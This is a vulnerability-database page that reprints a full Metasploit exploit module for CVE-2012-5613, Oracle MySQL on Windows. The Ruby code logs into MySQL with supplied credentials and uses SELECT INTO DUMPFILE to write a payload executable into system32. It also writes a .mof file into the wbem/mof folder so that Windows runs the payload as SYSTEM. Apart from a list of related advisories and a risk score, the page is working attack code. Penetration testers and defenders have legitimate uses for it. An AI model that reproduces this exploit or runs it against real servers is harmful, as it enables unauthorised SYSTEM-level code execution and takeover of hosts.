Oracle MySQL for Microsoft Windows MOF Execution Vulnerability

🗓️ 06 Dec 2012 00:00:00Reported by metasploitType

zdt🔗 0day.today👁 33 Views

Oracle MySQL for Windows MOF Execution Vulnerability module for Metasploi

Reporter	Title	Published	Views	Family All 34
0day.today	Oracle MySQL for Microsoft Windows FILE Privilege Abuse Exploit	14 Jan 201500:00	–	zdt
GithubExploit	Exploit for CVE-2012-5613	9 Feb 201304:59	–	githubexploit
Circl	CVE-2012-5613	2 Dec 201200:00	–	circl
Check Point Advisories	Oracle MySQL for Windows Elevation of Privilege (CVE-2012-5613)	9 Jun 201300:00	–	checkpoint_advisories
CVE	CVE-2012-5613	3 Dec 201200:00	–	cve
Cvelist	CVE-2012-5613	3 Dec 201200:00	–	cvelist
Exploit DB	Oracle MySQL (Windows) - MOF Execution (Metasploit)	6 Dec 201200:00	–	exploitdb
Exploit DB	Oracle MySQL (Windows) - FILE Privilege Abuse (Metasploit)	13 Jan 201500:00	–	exploitdb
Tenable Nessus	GLSA-201308-06 : MySQL: Multiple vulnerabilities	30 Aug 201300:00	–	nessus
Tenable Nessus	SuSE 11.2 Security Update : MySQL (SAT Patch Number 7251)	10 Feb 201300:00	–	nessus

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::MYSQL
    include Msf::Exploit::WbemExec
    include Msf::Exploit::EXE
    include Msf::Exploit::FileDropper
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Oracle MySQL for Microsoft Windows MOF Execution',
            'Description'    => %q{
                    This modules takes advantage of a file privilege misconfiguration problem
                specifically against Windows MySQL servers (due to the use of a .mof file).
                This may result in arbitrary code execution under the context of SYSTEM. However,
                please note in order to use this module, you must have a valid MySQL account on
                the target machine.
            },
            'Author'         =>
                [
                    'kingcope',
                    'sinn3r'
                ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    ['CVE', '2012-5613'], #DISPUTED
                    ['EDB', '23083'],
                    ['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13']
                ],
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'MySQL on Windows', { } ]
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Dec 01 2012'
        ))
 
        register_options(
            [
                OptString.new('USERNAME', [ true, 'The username to authenticate as']),
                OptString.new('PASSWORD', [ true, 'The password to authenticate with'])
            ])
    end
 
    def check
        begin
            m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
        rescue RbMysql::AccessDeniedError
            print_error("#{peer} - Access denied.")
            return Exploit::CheckCode::Safe
        end
 
        return Exploit::CheckCode::Appears if is_windows?
        return Exploit::CheckCode::Safe
    end
 
    def peer
        "#{rhost}:#{rport}"
    end
 
    def query(q)
        rows = []
 
        begin
            res = mysql_query(q)
            return rows if not res
            res.each_hash do |row|
                rows << row
            end
        rescue RbMysql::ParseError
            return rows
        end
 
        return rows
    end
 
    def is_windows?
        r = query("SELECT @@version_compile_os;")
        return (r[0]['@@version_compile_os'] =~ /^Win/) ? true : false
    end
 
    def get_drive_letter
        r = query("SELECT @@tmpdir;")
        drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || ''
        return drive
    end
 
    def upload_file(bin, dest)
        p = bin.unpack("H*")[0]
        query("SELECT 0x#{p} into DUMPFILE '#{dest}'")
    end
 
    def exploit
        print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
        begin
            m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
            return if not m
        rescue RbMysql::AccessDeniedError
            print_error("#{peer} - Access denied.")
            return
        end
 
        if not is_windows?
            print_error("#{peer} - Remote host isn't Windows.")
            return
        end
 
        drive    = get_drive_letter
        exe_name = Rex::Text::rand_text_alpha(5) + ".exe"
        dest     = "#{drive}:/windows/system32/#{exe_name}"
        exe      = generate_payload_exe
        print_status("#{peer} - Uploading to '#{dest}'")
        begin
            upload_file(exe, dest)
            register_file_for_cleanup("#{exe_name}")
        rescue RbMysql::AccessDeniedError
            print_error("#{peer} - No permission to write. I blame kc :-)")
            return
        end
 
        mof_name = Rex::Text::rand_text_alpha(5) + ".mof"
        dest     = "#{drive}:/windows/system32/wbem/mof/#{mof_name}"
        mof      = generate_mof(mof_name, exe_name)
        print_status("#{peer} - Uploading to '#{dest}'")
        begin
            upload_file(mof, dest)
            register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
        rescue RbMysql::AccessDeniedError
            print_error("#{peer} - No permission to write. Bail!")
            return
        end
    end
 
end

#  0day.today [2018-04-04]  #

06 Dec 2012 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.88755